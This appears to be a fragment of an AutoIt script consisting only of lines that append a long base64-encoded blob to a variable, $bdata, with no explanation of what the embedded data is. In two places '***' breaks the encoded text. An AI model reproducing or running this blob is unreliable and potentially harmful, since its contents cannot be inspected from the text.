	$bdata &= "QvhCyfixr7bOcO4lx/qBktOAlu/j+EOgA9q0OrzJVACbVNvOh4IdZK+k50MCGpCxo5sK6Ehgl/yQ2V7t1rLMPxMOzTl4cLKge+IHgI4PsaxAPNOzh8xuIoAZnNomHmJhbsfLayoJq5quAZjp2/PvAZBiOcdBJ1LTxLMlW1zlkBde1yIRcRx72tGDGtBZ98BDZDokcgC4iD9JP1x4gvi3A+AH9fwigTInUIOYesJ3TA4vCMTuIjfU+PqDMeDB+gjmSF/zFSE/XiZOsWTxI+HQY6DCRlJwknS5JdyoIziMvxGkGdcijwSMYMaUVqu1J1DBZKVgUMWOyVZp5EHDIKCIPJA6R1CQnUCAGggRJBFvhDpPmtewS84vZ/j2QSn1gLQcq3sodcr2AijbdKH7TS6BrwK+uVcQDq4QVoxjtMvSbQ/FJVUFMZLBL2bWoeM2ULHESg+FWIcnA4h4g4TYHHI5YGHh72KKyyXBLnsOC2XwRZGE9IkxcZa9r"
	$bdata &= "9p15oywrJjXdKn3TDnozRGzp0BzgynSCYLtAQLhUEdMKY/6zYvGQdYp6ACEm1tF47sNvCzvon7yEBX4gca2CD/wIICWTAfN8lUUkDLMDFdSzIAQ6B5YAYA3LIyBwgGDTgAwBERoxE0LcFGCp1HM3B4hALLHcDbNxqe0LlAf8/rcznAdaxP7VEDM4G7gJ1V4ClzBtwP4dP+AJqBHXlZukl8ZvI5CBSnTZ6UxomF4GrIT5MXlYZ00wRpW8CAVFoUlEeDh5pzQxe5xIYrAGYL4QYi88PhJl8qC0R0+5TaKcBs6xqiAX6XkdlIv4IbQv2QDwgfn98RDql5DPbD6v8ndAweJotY9kpAp8ijElLaWfDnto7d3IbhhfDVjJLXrgf2YUX6J9MYNHC/KQMRBdf6sXwkU85X2gCizlgOrfCL1dlL+gB94DHhjVRHM11E+AZJwPmJNdTu4tRqyM7dHarHncHBTmeQG7HGMDw0rLnrkQCWmh9KF6iHJ0V"
	$bdata &= "IgYL3sFM4RRVU1i8rFEI17TCpzvAvrS4RxRKxFLldyB434nFibfIUQGsZS2uY5lMyYwO84vyHLhf0UZ4rFgUdSc5voE8nvSEOLoXkV11CVPaIaQfc7Rsi59PjJCLdH+xYQjqYVyvPLbcGzmHbxVQiY6PPqXVeDsN/iDjHaNfMIHn8E5kgf8w8PjCqXiGfqzT9MGhEzymTgGoQMPARmIuRY5psL3PhYcjkB+8lyImEllA3WoM6hE/ZyuGsCRwDopAYwD4A6e+BuONlpmWDqIYYMXdjmwPy/ffTvfa+UlnOQyycgFLpQ4mV05AIxPhe6rTVGDB4oGHSnKQ8Mqj0lgqEvH/GhTsGPiPZLuZTjQ2UWlBrukAB7jTGd2Yvgb3EmCQAGXKPQ6XJw2+EhiYGBoJ4DnLUhBWkiDV0LJaq70DflmzjQ8Dwv+JklyjQehU8AhYFIohvhl4714uhqwVt/mBzw4graYjFFJymQbXhArgJbK3x+aOw+cKT"
	$bdata &= "l8JLLcQdSPrkK6uWmwVU1NLpa2YfXc8N8wNYiBjn8FbByuJHR0LWKsxRU9R/9lrQ4ZwsDylnBcNYWoCy/8MgzEINBBhLumz0AILbgUPr/DWai0AEtmVutm2HwP/F1IxgDeo8ItFGKoCnt3ssJCmGB4cO8HqIsHRYVzcGhyLSw2yy6s60dqj3iqb0xiPtL4D2CvDATgUhRMO0f1TRUDGyMpx+tOlaqxhNVwn8Eu0pgq/RDdWkvYASqvWcAS4UWOaAlrFFkxXBFw0klLgilOH5Rs8bBMEWHMOobSwsEv9LgC5qYH7c2WDVVobDjQT7UV4VUOOJci/izWJAwMrgX2fbClQAGuEd0twLQy4BDGXUT7CW8lAL0ZuF0TcpHqIVryjnAU8thy9zRQLL4RWslYvcClImLAdNP1ZxEsMf1EGBQyEH9lVqC/JnhkfCHm3iB86GC7oRfI6GLp8f8yrlCMUi6cAfIDIsfYMOXR7DPiKDcN1bVdVmcL46S"
	$bdata &= "WAN3QasVhAbnst0esYM1TeDABnXFEr+KBfixxlpGoA+8GuVyQMQZvO+QZfI0CdECuIPkkt8DMwcMMrCLgW/zfxqubBUI9n/ym6vEU8EYodHjDEB+Er5CgtbyLxkxEc1zVQDCFwWz8cNBjk9zklkIh4Ejw4KwGHYulhCFZq4AOr9Q/1QwfEkOd4DARSAbE+oCE3f2B4U1cEKv1lS0nv7nZXVQSIEGCADvq253oAdwdWX1uDvnDTGD93Bs4QLjjVh7C8r8YmAQT+V5l0z8MGpmYVlOefwlxTAfEsoR8BUuFDzao8IjQ8cxYcYtkS3AFTic8FTgWHU1eKEAixBAsDUzc6luDEpD2rNJcmjiJoDGyGL7uCT7QBRzpTAbKWPylXIJRw5QiLhilHDK3WUwHiJKS8dFtw4VgqD+4DhwRyKoWNb7MvCVlsmTLowY1d4zuMFNDRKxeNnvQD/zDUkLokpZABb/C8+GX2ZVNyLAFDXSQKnpAoUDCIife"
	$bdata &= "/TSkFXesNjY5+4KiOFYd+w9ujnHqUxBAe6umCYYjoRLYtYXQyBZphD+CmG0wzTMkX6w4xTCiMK/XFCFUQo2gQUm5IMcYwOZbSHm4CfQOJDAcSCMFah5qIe7y85DGfVAFUAVABhDzklFQBTAHBxJenWAhAaiSABQKmLxkxryw9MsVWc613hgmNLIUQNJNQiVC8IJygIFzTmBHfIukf+Y4CEpPpGRIFKaEcf2pQu+sI/CIMOZ9Ube6EQBsRoHnviTdQvs9dMOum38xCgOOA7ID7gLDcI1YAKMYlXj0JoYL3AD4dBt5OZ0MsYKhCNSDUEgssUbL3xtyxoNC0Ckr2MG0Lcof1dKkUPa1Do3MJc+biVfC5zWQxXjyB/h8whckhhOcy1xx1ElBagYcsVtZ0BjpRONK0HxARqqB3MjCgLCqTDjFXUdeEQx6w29gNKmDwE4VlALdM+dhohAdG7ZEIp8DGr1IaY2bJD5XC0OH9HQjCElJqFFVQdUPc"
	$bdata &= "WMDHBp91C6ALB9AXBSwteHbeC4JqEWoJUDBuVacEflEHFfUQatiISugVagjmIL7rOUPrSk1CDsvjie3duYtAgkGDtGveg6d0D1Iytz61FoBxBFR0Eu/aQPCNIPaVF5gBgEckaZaAcdXQlVYFf8MQjdqAxodlchUwDluHsXUKc3CjBwLqObubD46RMz8MJj//D4ycADE/NQQwjZeDDzS4LQBjUjqjitLyaFae1cPjdxtALBCB4k5BgfqPbpLLODxQ4AKLxxxQ+BIxUgFL4TgsySQhTGGURBgXupm0wKjydRvs74wV2XoLFs3IlrWIM2F1EqnHf6H1SRyXcd7m1iUsXQTfbIRzY3ALvnAdM9tIOVRFHAGdxqak0CucTloPhUEc4cEEkInOy8Zn13tYNTIG6Kc9Az0C75cA6jYIK82iAnd1WuNVSHKX+VSV7yGZoUZAOlCNOou+BDDBXEA7x3AjD3ATptdOEhQlTMMjeD6GP+sWb1yBE4wcK"
	$bdata &= "BhgY4RPwEHAo/IX89S0FPzGMCXrC7o52sO+01wXgK4VCnBvZIRFOjUXO90GRxwIE/TIUFQSAbVgpEYB/wgHN1af+xhWSBHBb2ftElHhCHH5QmkB7A2/LL6fZO4ErK7X/K7Emae9a7i8XwjRB+Gc2U0Jg8jFgJTuHgg2BG7CzikdqYaoD+T2gGssUhv1UhYCR1N***IT65TtH5g8AHLMJDosxwnABRYu50Ege+IL5NcAOSDP5QIMXG28JJqB2f9I/zhoQkIflBaJAw+hGbfBrbUFUEsBGx6S2p+T8eE0SZdO14yoQN8JmKAPtCAMfOp1XR0mTYYgN0OObV08D9QHI/k9S14QbdwBA5IcyMABBqawDmJYetNxAG1/bPR3phuv3GZZi5YsE47I085RR8soRokezDmFmYVVKOnxjdLEJFJd4RztN/wJe8HoFl/30CjgAV2DyBD7ESOSgGNGO0ewG0cFS40k4OWXNvEATGvAdkpBNR+sF19IV8"
	$bdata &= "UM/ALCIy+5AcXsubn9Jr4/g/4UdDUICXQwCHQrx7u5uRV0Jgd0BQZ1FVFTPWDcgCX1NDr1QZIC+3meLum/DFfADBBWShcZEBB9lgEuDpnmhgcI9NYS/lgBwgInarJGL1wDahxiPDCZBSd/SG8yaMsK0D1oNg6s1xQBVyYt14LqOpIQCmHVIDCJh+6rCVEc442e0GzEkk0iXhAC5ADuuE+Ga7BVJQ6q9R9gAzv4dCWDe7wfZBGMwE18DTlccc+g9wleO1gsnPxGISEyBWFQLsQD2P+uvgF1leSndQIWqQy9hvMwmAxfx8wYBmFoVJUMylTCot9eXEqY1iTCUFkIm2IT731aw34Ig7v1KRwPkzjOSMJsyVS8PEM+Xctz+Rowyx8Qi4MoQgEI8hCNi35VUSPSu4A1rFd4xifAdYMzWMdYwgko0v6CzM2t4+j44hYICHQRFHQMwCfgOuwHWrNbgHttfaVqh5jPfQczEiqKFw+cwVFXIjC2Owy"
	$bdata &= "zMfxX/iQcRH8UyhCB/jX2hOZYYBQ2eBgOc3kknDjeMwE0p9Vb+HiLR1xVUBvccpta5VduMmESjnRm/AjhQXQJICih1VHh6y4IdM6ediR8Y1NSMl6cJTuohsDZNCiPUSzc0Xd2IKiJAle35du5oD3DUFWzYbzrwrs0GkLPdIgWDaP+CEkBFGoIVQbOlfosi6y7iNCAIcPFCv/NAFzoHFMgVan/fTBrBN/xyBJFHAAOTKUOOBTdgwPwLFgzAabZTSQwXFMM9RwhIMBo/4430gxU15La6qjU384EKMoKsYSoAQ6JMCintgJ2yModpQuNr1VQJzmSG55aMlUTozyqYT/BCYP/FHVO8UVSwJjhEmVbqEkE2uX4FE7aE1Z7V8Imc5pQVlcFu2AsNfev8Bno8MctHxtFbF85evD1A0eEij8mEVIAwfYGAQ+3C1AGQwI8rMBEGkPqLpuPNgRYK01YE0Zg2MeaOFJjAfccPS4kBh5jZI1QqWxptR47"
	$bdata &= "EFnubyVg4vzMFmzrBFsEQmcC34QSQD4MDkM2OwEHnlJfRXxesAPqvBnqt+/2zMeG73FRVY3tTgWFYiyGeZMr+qhv+4sXJ85LJmSQB8484EEgZJO/GD1Qduoh4KZ1G9aogQ1eaM2Lig6YSi09fBKVoYY4FFU4WRGfBTR8txVUSB0lfD1uPpLRroIICEyEEAvB4BKPBFH+zDi28EhaET7O5BATTg+EuFZqtwcCEBF0HggQPRykUqAIMAQUdSEKpAEGvLnZBHZiQT8fUhWsDck/K2IF+FzJbF9+RSZOyDuYPbS/AJSNhb/O/A8lp8ifzID5agfExQIRlzcDsMKW/YvYacOBRE/fRHHdwEPiaFRcdT5YfFAI17c5CAN/NGoNxwN8gFN/pquTTgRMYCWnTD2J09MvgHJW6AmDwAxQwwJO0qckofw/HBjJEE4UQMMr1KY78BzO0m5oR/RuJVU6uokEvFvbNMk3iHdrojyNRzw0ocMAVj0CsUIBX"
	$bdata &= "4FXIC9fPbTMxASQ6JRf5qqv8cAIDDP/F3yu8eAapXwCTJVUxsI1ilzNdBOARrQRUKkPpCux/9PV0z0cv4CGOGT7amCN8gN6wJbgiFIPNrZHWKZIRzyGgGgk4lVQHeQmMXo8T/A6K20pc5sg5gpQljR0KlcuOL7UAdhd2iMe1b0KdEz7vkvbI35gHHhAC2h9RHEM3HLlSLb4AC5NDVenwcOf6kBe0QX/0IwHbrCmUyFsYqeoEboRTEgWsxZ64rh0KRLNMwoJ/NLSi8cY/7sBesmi4lsVMBKAGaBVCkngAap4/1HxmFb7lQMSBDh5WNToaALzFy4tOaQW1VbiTglX6MkU+shPDvIGaVvfzSBMU4IMRLQBXATiAR752hgCGaQ5eV0kJCAoEE+bFPm2bAbgZGZEqKK94AWemMAMn7EKfw6ATrciDjmG3PuRFdEHswdV3HRyPiMFByMXOaPQTpioDh1S5yu8RqV9oILsfIvEviBQniYM1ElQvk"
	$bdata &= "R8B6Sb2muKNAIqhzEjqAynZDc7Bw86oUzlECr9WkieR46AUb7Au6cRU/1JHvx0U8lIUQGrCmhKCDkXN47m0ClY1iLMB54LoaVwt84rEYuASlQcQTLJ+Np2Uv8/IGvAmXxp67MpWJlCINMIQyX+z7Nwx8ehoc8ui3atcL6MKZaPFvbOPO34VBAKV6X2XMYiwIFYm1pOyB4/PdQ99CHrFZofSSBi4Uxs7wQkmDixdKnLBhIU8xcgNCYwBt0RhpBLPt4M1VHCChPoYoEUSwR0oTrewXN8MpD4Dr4RfAQCGJ0uwki9815ZRdIlAsGU7+C9HdIYMWsBANagTx033iSQ2z8Ntu4TTnF17JDESqZ9RUnAiNkyPSb4CUOT5JG3TIf0JF0hry/4qrJGn9Zcw4HtbhDfdbBGDI9JJRYpcxjoIJZjIeDQiAgMU9AEECWZYM03fyA+ixXa7EcInD9gM9AuICZbgyemohseByAs/z7AEBbgQBhPOwDhCAX"
	$bdata &= "5YNs0AGDxXeAe4FBHCw9MlYjf200lKfIhiX3cOOQ7AIKTxPt1BDwMIHF/HTI+NN44/I1V2LHXLAw82MzuTDvzZjvDuLusG09FWNaL2IrYXyJAF1LYTovDmysI0waL2otKdC/wTVRZ8NtS8XyCABUGeyQCf8EQGsqLVeBT1NthnTQHgmRi+MOkw788i6Q5ZHg8PA9kqpDgGNiMgO2UNDwcUHAYUXyedqIQFhAMCFJkAHk059nCGHwkVw7AwIvwTeBRwW0ghH/InGmADtQPCYNP8EsfUfFIeIsJjQGh20Ds/xtobV3WFpEUhClPA6UQ0ibj7b9SxhE7Qvh/DIlC9IDGBAgAGKFVDE2fciSDPM1IiJzEwFpIyBANEHQUh7TGcAkIbzEyZFvLOGosAPDS1h5xNF89rUV90UiVEJQwzkAunz6DjKZART9N/C0AONLskLYLwaR9EtIAw9EHfDCsAwrdYZwj8E8Jn6TGRUAgU2gD8ASAd0JSnFjL"
	$bdata &= "jEUZWWexFImyBN/ZwHhp4A+I5DtFJwtvNsQ5BEX0iAynWugEQak8PrfPwpTQE7Jk7TlEI45T83CivDya0BKPA0p0LronnEgNrj18VppMHGjmgImMcDuZWmwXi0rC+5AvnrzQrQSxFcU3wF5ao7C3fFCJEGc20kCMmDOc+CS9VcdKcOlQiSxUQ2grq99tG5gfoesHw97ttHAM3CLRTFHK6kRDgHN0QOYCxmyuc9k6kTl3FTxcFIxdgOaiwY5pQAh11Epst4w5tg+NtCyccDPxFcJWiIXHmXUQ4YYWwMbbNEDowkoJFpdDsqQM4Qyd9wYLCk/T5GN9QR+sK2jeA3/Wecxkt/fPfis9Q0cl+bDPVg4Qj9X/N9xRpLzRA9aNdBMJjRQGSMAd/o1Z/TvTfhUQVaKB+DuQQf2DxgY78ELwFtZmhK8UxgHsJhQaK+u0VrxOYeh1xF/8pULTXNvhdG3rQHXDVCZ4DsuEvXxTqnWF8bVRhn0DzgFe7"
	$bdata &= "X74uIL75YXrOBQGaDScBr3geRPvzINaTDjCj8duAGJ4b7fn8OFhWS4C/mFYw3mGB/oMHnIwvBICN2xNEU4EUP2UO8p+PWxoZpCicwW1LxJxaLQtNySNA5+0618CavDH/nNTYfAMC6IcDPwCVK59KDPrK1n+AoAG27B9ZxiBBnjCqbl0husfRTh3JugAvySIOpbAFAolOBQnmX0fmOQGvyUq6xQXJsAH6/6D7gnrCB0JEvMrYQxbCCF+Mv9EmqBjpAGGHIGBLzhcDYsRV9SC+LrSVjBV8kVKaJEcOqS4oJIZkpyUGMjX0hrZ/82ArSRHMpCkkY/SclwsKSyKRxYUwF9Mv53SGcZ8nVSeqaUlQChcgjkAsPyskJyI3BtvQQRooAdQYO+H8UJvcwRGag9rPVjYqIyPZ3DwXeOldDlEdDMvfCCxeB4rwSh9waTbQgMvVW44BmHV0rkyulafrM7LHf9VUUDhXMQxnDGFpUdHZchMS6+dAcAzCY"
	$bdata &= "zGFHELXoUBF0QQ47Ywe5YVGJ7BFhjC4MaUdkgH0iYybOCO4brTnGFjOg/Q27AKz4n4+FdgaAdldYuDgilICBTgCmQ7KrKPlXVfzR07Og+PgRr5D1Jm6wtPgjuAkxpRib3RD2uNVWg5jjJlsNLBJmrpOch/xlEyJi4cOG9tLdWS0gBg5RhIXFNVmTQdDqTLOFfHddquZQxMjqqebJ+D0QvBjB9APkBIfSLtgLcXxUBS2MefMkdsh6zZE9IUSFpUrKRGMlRK45zkBNQAP9/seQDIK8243+zrQRYK/+SE65BYoyafXEg5Ic0+4D30oXvQUQvHlQAcIq2YUz8/iCGHmIpfzhoFcpFMfOOCwaB36V78v9XgoQNHeJ+8NVIr8cZAbHvFAy+NoN8kgXgYATuYHlJXD4NEGyC8w80FQEdgrSpagJZzchovCVgq5nWZD15KeIN4XDAFOKBgKFlD/Sk8eL3MWrh2O1MIcjwtAPi+A9DsDMJHjDtL/Ay"
	$bdata &= "Je/SCwIoNPSnDG3hC6/c0gPe8g7RgTRyD/SkcROACfJUcXzOsRH1fAa1cMC6rS9T4W1JYnYDDB2uVtdn5OdU0UiTnfyHkFoAvf0yo9A3o548Cgf9ZB3aDCunYdQ6Di8M6CDHFOoi/CUhWpspf5EHkGigs1LNf/DqbQMUFMOS8w/JCHgieQENcGmHdG78Yn00tkAcB5nyPqgPZfkTM5t/OSDYTEEkfB0WAlUxyQkNcNIG8InnOeubs5IV8SL5FoEXE9COTkQcvCP6DQiUSVsdog/kEKwG8KUYIBXVeUwUUfoIIPD0zyaWSGmhmPI6ida1Phyozi/nuv2YSuLKduGi4cxOxZFlrvXosY85ur8d8aBSPQqPNX1pfW09QAxBMjn7F5axzP6AhgwxXTlBCCS5MUy/6N2AmLB2YEo7kg4eCBcHvEApQagCmAFcIRtcw2HjHa/Esst5bYXQH3esC/9XxnmjLbpkB80hqCBKXedrJ2kkePCRRCS4T"
	$bdata &= "cgVWJiEh7FYGT/49u6z4gNPq+Qg/AcJMXhCuialOF1k2buB0TVcnrlxZC1LXN3QFVmXNlulQ0dDBGAhV1/yFfBoVX97n3BzJCXlHNOo8qL2yDoDmLDnoOgp5Md9FxNoIuaJS/+qWCgCcR7ifZHAAfFtVrdgAFGyNR9yCSLuBfIANb/9H3Ah6Id6LZXYfx4BIwQuCu+GOJ8XxHeJduykB3q5cTjkDWm+/yEIlAwpL6OBqdeCbf1+rHa1Ibvk/WgQtkAEdQGDMbd9Fl7FXhNSfv7OsaYJ1QRjf1xQTqFQSH1UIl1lIL051Ydwu4USh+vfDW7dPTz0lpld3LXQT/TVTaIg/4CEcdiY9IziVcPYMdx/jgcEV/SyOgBNTnT0wBhzBOEXgtBUFXDzhTV+3yAdYu+CSeiRJaB7APGy26XHGF1GzUrUCHlxIDoyY388KEFIgr+tMsAbJl5/rfA4JX0+C8cRQdxpNCeAuabAgTCkDLxmDwcGoC+IhE"
	$bdata &= "8lWAwy1oHX8AY+7fCdZG8oVfhAxqdSbhthiJEs/oDV5KQLlcGrw9oJeGsHMi3RgMUnogDJXm9CXrMpRY0xG0TpaXoOBuzh0xwv6+B0kdYosLsgQxgNjWmbPgP7ZA/P32Cvx5btQBmLUNh8FQVwZ2x/fF8ZDYF7lCbzpuAc+QR0gUwTAVoGNwBUCUMeDcRm61EC+dOdV0ongqWlbVwokcimQLghEEBRICaTlGKfSA5cUUhAseFyXhAVJVVKodDa+agJXr8CHEQwWJD+nYE+KgwfLAB0fOlbLnxD+GAefqczI1TqJESrhIo3kgazA3klI8CyBvAQwvko85BIjOUpc/koQuprC/xUMNN3hFAESEVgIyUfCiee1TJ/POjmK6RXwXF/wetHACL/PNeqSQ0BIjcyow8kMWNI7CIwBQKkgDucKZQQ11QxgoJeUIMccY01WW6+QBn+kGSlcUbtQNEkTwotOSEwwila3XwCBhfiAtVrH/KkzIDoKUq"
	$bdata &= "i4iwbesDIE1dQCy9tDC43JIM0UEBjQB4AucW1+BLGM+gFLahCm27JGAKgYe5kARSYZGFMK+/4MBlSDxf9Vp1ZZbEilS8+/z5hyVAqBSSi0gsE48fxpl44wpf9Th6ggohTQimxa3ZWgMD6hoAikZqgcBLqOQ1MFqMMx2kGgvFESt7tVPDs6HKQSBIKX2oatJn/1UIkIXCiFl849KfGDWvnRC8C3M8Yg1UYkUYvYByGDcCjVyRaetY2h29T2HAUfJg4OKHTYmhlpre7XzXaFBLfBfxrR3OTyXuxS6EZQ5jKELhxxn55BgK0Lb/gvtQuDF7NfzxTyAJDI8TxwQh4g/kvI9SwkpL0In0zwQXXdA/GwAQkugYUd/DeKPvbQIkEJCjqIDCH4B4RC14sR9kAJAkZAB5uCGXRrQG3gP1EXqgl8UctwJLFSsiIviUaCTJuPrNULSOANyHUGgE5CBIA5BfviZgn3R39XNvWWoCSAsPxYmbjrjvIiEig"
	$bdata &= "C7jXJrt4/M8lJAGq2GEqwgg/kWb9kGAwMPDXwUhqX4BlgFDrRyhtQ6OO3tjCAR4HhkFyCGfgmmkbGXIHqUiHojwRAEMyAFGDQIaRVOAeTZWfgomiVDL+LwippeQV8Upj/JP2R5No1VaEQFnCbp9E6iQpMawlPzT9kAnWXHTpqBtdMs1AuNfAAFUZcnlFkYwCxBArMoG7jQaBs+E0PNZiYUhTWvzJbuwp1Kx8MjhOVEn9NBMryCADnA8fj3ligCzADVKpcXNNAC+MjJLm7aL0i0BqNkFQBggC6JHPDfAYG8JS4/DUSuQQM4MmwKjnIAA6LkdhhZACPi4s1d8wgpDa1soErBH5wVdwsuHz8LpQ7RkHi4FIgsJmBGE/OV7kEdRj0J2+TiAF90gUA9yj91JkzwivCLGQsBqHrZO8yG2hKjvfZuw0PO8h/DCQayIkfmFoBzt4rBVuymf1etlWA6GNgvdOAFQUDXtqoPVU1AFAjiF4IBAmwrYhn"
	$bdata &= "BZVGHB5O0m8DkSA8jFNoNn+MMhyqr24MgEkgtlqm/V2YIOsKgGEJ+xYg9P/f4+wMO4lxDIl5EAPGA9dfiUEUiVEYVpITG42e1aOJXxqmKvZHCeDtCKwAdrtPQAEUQm/WfBGMB+g4H1/JolFpPWawdFipFz5YO0Y4MhhSUwZwTXwFbAnDyu4Ul46EC5aMtpB/VMPIhOGkU61N7AgrGAPJAyQBDkKqJ7iZ+jM8iTTc3beeCqifAfjss+G0yaI9Q+4IAfcwg9hBCodNHCjokspaJWyyMTCVthwQYhyQA1x6gZ/1TBjsZyzf9kO6MJWtBmvo5yxKojkKYCRXl49VkucqI6+bV0QCSAxZKi8uhkMS5lVcLDjkhlS2CV2Mc/kJuYgsi0MMVxy4EnjJGFMogseClKUZEtNtcV1wwkeYYz96EwRXHs4E+/ZGmprgsdFAxu8XDd4wnpW7Z+IdC6EP8AyNPBrIAkwNqPwCs471gH4YZT/kn+fyuklhQ"
	$bdata &= "Q2DwQxR6BuQXVZAjS2iRKcTdBVXI5W1ihJpTZ/l0AYGJgyhMN5UcZobEr+FoBWrEIP/A3zoNf8/lgyERtbdx7EgwGKNX/LL/DSWYAHtDC4RllwYjC90y7D/jRQJA8mL+AbujBLZ+gPVK/qJPl1TpzS4k/9JLImbiFBuOYuRFshHWSNMrFwC4lnl32ARCIuJZEjgKAilJJRQcn6v8IDAoaNRVo/xG3dHuowI9tyxOUY0R8g6u8BOKIkOJ4wUQiOm9UBs9bxJ8FJPELMFyQR8HnhD83pSUJCDwAXf7+KvIYGOU/uDwAVOCmusJ14dqoF7Y/ELx8HgQAgDy0QAtAYgoGlgdZ1QIUyOCLyPby+wlrlrMXEx2RBr26GR2DFOUCqSrVBXNxSQE/qLRkx2owMALDYQ/yUFXcO8TAB1CSuB5IYsneoCLguWxFYaAEYYj4***EOXRsJWSj86BYt2MLDwi6wNo01Pl9JXBNVwJGPk04pVhsJFIov50B"
	$bdata &= "Y84zGNDHMRQD2MGJ/Xjw6QVx9NMFPXhaNwJYTtKg+MlQHozwrpGAiOiWsIfA2BVzAWbgQvS+sjgG83AnMIIAw+8y1gAzWMviv1K4KxjZQmqFbyL1gF2CVokFZ/cP4Zoyml/zgkvXvaSWGlDq0DyJfRsJ/6hF50A+0C1AT+F39TBIPvAYkEKtDpGQYeNvDHyQ/UBuN/TTDokIAX/7zflXG6MMToP6h911GK2qgIdReoSgXVobfds5yoAhEJv4FxQIncgb0cWOJssFZaTNMDSoCDQAOvtdQUYThsBHBm/LBjJ6Fc3WRAA0EkXDio15Y1aFpTOBpcBGBkRuuKSAfzkwwYYO+t7YT6rKltiFarLEbTIGC62DDHiZ6EAyaK2gFUYSPWpB5H8mwDASbsgVZUHDrjs+QPdl5YPchKZD2229NFByfrVgpOzhhAZhq4e3Lf7iRqwDvPayxITkxUKdBezZDnLjA8GDhgZC3cWgIB/vG4mkAkOMQeLiI"
	$bdata &= "yTOzB4Mw+ergWEl5UGAMTThBP9FCCCxrrFSV8AcbHecDQkFhr6vbBAe0W34hAsjtEUSzWRoaCSGUsMFA0GALVaoQ4Ogx8FtPUAATodDAMI+gHTBD0dRlW8DHVqTPWV9/2bGqECizk3u3jGJyICe01v9AG9b04lU5o91Sq/uyScBvclI1+fO/HByZDdSJOetGIoLgwBeZGXP8sZEoQDXb4uOuAGJNGJOxM0x4COJ40QET44ZgAn49GVNZP+jX6AUjTx5CRx6LIIeFg+Li7iB3Ahth0qUT8DKKoJOsHtXzQQsCD+aRCZ2pHDiUBvYXAAfoCDzKeHFeQft1qYA649kQNDGp0gAPlo1kCAFxaKLd0YKLUT9oOPMIBek68oMAmwAObR8NawjQ9CCobJhG1BG4gpFSdkyF8dhoV3KWtCviDArVAVRP2nNI7rH5wfimffEk7GljEm4F9jGyLDLgJDSDA3XQ4UN/igrQ0fNyUjiAOsDyfYspyyfjM"
	$bdata &= "dQ4NDGgDKjiPwmMWMMUf0B/JwS2YqL248R42KLQDdaZgHWBBFEnQELxZOOC2NQmoiTwPjKvwDNLsLsYPjaIQQCDSyUIJaCXLbDa0w5eAiw/19XwECj04fLhwOLo3lafSWqROm1YMios8bYkF5FEMmAwQPDZ2NtEUF0kYwS2Xx7EMEDevc0irpkCuOFtB+AhQWO//1Qtg0XFrwE/2PQ5MnLAng1xRhOnBfCJefR1u6HTBg8bqgmKCdBSKD7OJSj7/nk5VSmgDcR4CP1ycFu18NGslfOQmENx1e990btI/KOFM0MAMdyw/ME8ZB29cr6BUAgNCW68FWBBFghgRXJI4La1EZQPRJhN9fLxQrbPcZYXOFAEQDYd2C2uGRzXAEQYg8YYeaXxCb9ckFA6jstbGw4rGlMW8+3I0AE8Z0Q0FnPMDOWHy+BF6Af2JfI3/0jTOpVs2jMCt7IHwNa7HIQPpFkJdNrgNADLpgcS0rV+gBzXR8eliaiuVo"
	$bdata &= "wES7m9qBLg4JKBRnAhIfCSBS+IQ7xRBZpe15JAABhY+0JdVFFNxxXAYSox591CJ8WlbpvHXtJI/LYvHXz8BGBc+AkCsw9+3CnbJYVg3tLi2uwhMfEo7GH1FGB8CwH9UsA++USQGUlOL/hL0tugWw1AV0uh0EQgFXjJxAs30B0IN2RRfiTFHgGAx2wcm13AAQnAFVx+ibwSg9hd5Do1C/wiAC4JQkB4lAfYxGuolEl4XXtCeeQg8h/ZHKtUeEa1mD0F6xezBLFpQC36/npXA4RMZmcKun/CI2KPSvpNqD7wr38RVxJEDdivNUNA6okK+UfdESM2kbDsWt2pqBUURdoHhKnDswv9SO4sqbAD7wtzVuWiS8YluTIr/zk8AAQ9WSnx8uZDpCPCaVrPirQBOAJxdK/EClQ7YK1YOzF8uNiSyo4GOIB/AQUi+95YgTFQ5Q13UxwfImsh7vUfWAxzpB3xIrqNQh8zpXK9TV/vO9eFcpd/+NIXSX4"
	$bdata &= "yUGYbhMWhbRpeibycUfGk7VmBkkFWNDKGtdt4RFBQ/uGoMFOONIAPPisPGmNj+AQGyACa03tdcC/9dy3Zm6K1aOssEwMHhEG5nIrHAUmguBV9b0sAkCYDFDGgUGzgywD05FHJsvijQeKOgERU6maWRBEZ4GDhodOH2VhQ0TQX3VOUcaMAbpPE8704GEBQYN2EhfXvwZ6LJOmpw9GggJhYEA3zU3oJQaNNJ7zYV5pdafCu5XYKcFuc1yeMkn22JKCzDkYKVMl9dAs+HsFl0Ab9fiHgIIVwndT6JxkQDbwtfkHCBHNJs6SDCB27QhlwD3Riv9ogBwHdwaEEk+5A6ri93iyC6ty/zwBzQVY98CIECWGH0Ec10D2giQt/jziUCBEweRDNTg7TZhvAiLFU5Bm10Ozv4QGh0EO1WKDpAQSxt5aBqIuHCgxavAi4wvUcrk6wIAHQ/mxLuwuUo4XaD+o70cBrF0bwUjYaUU9Wo/Gg1zsEOZv3orsd"
	$bdata &= "yu8FKXkVtzx/QtlpNOLEW92BVi3CLkoBFnYF+k41OfDsOqNsDYBsnJWhDjWSqKf9/WQtXC6jzp4wp4U1YeljEs3BWB9IL04Qf48g5wQIGzOAhUhBepKBcg/n/wxMbuHjIdBu+PfzBLJ4tEyEhITXHpd8oGdiCtMHt1AJVAlahE7+ypE3CAswiv/hWun6ZTLS/2H0dGL00b1ArfKJQK4rA519lK56Igf0wXkzdUY8GAf+B7VHniHe9GIPtBMEYvxGBFEmhJIpCCDwlB/bCxHUSaHUWOTwnOHoKwHXTkc2W4Za5AFJI1qgFYPGjLIQdPYEULxEfBTbgtIYnTpZYAScFZEvttpJAh4iqdQxmLT7ChGtsEO9r+IGI5nw2O27yMQjAZqt2XHQsy0zJYQUbU4teDIWBCGylIgGFCMW1iiWbfuj2/tBcRuQVSizYItsA9AFpJA0mpQBwsnER3zhrEGCWVKi0gDIbsFfFAYtpNEeU7DPtAl4IEHge"
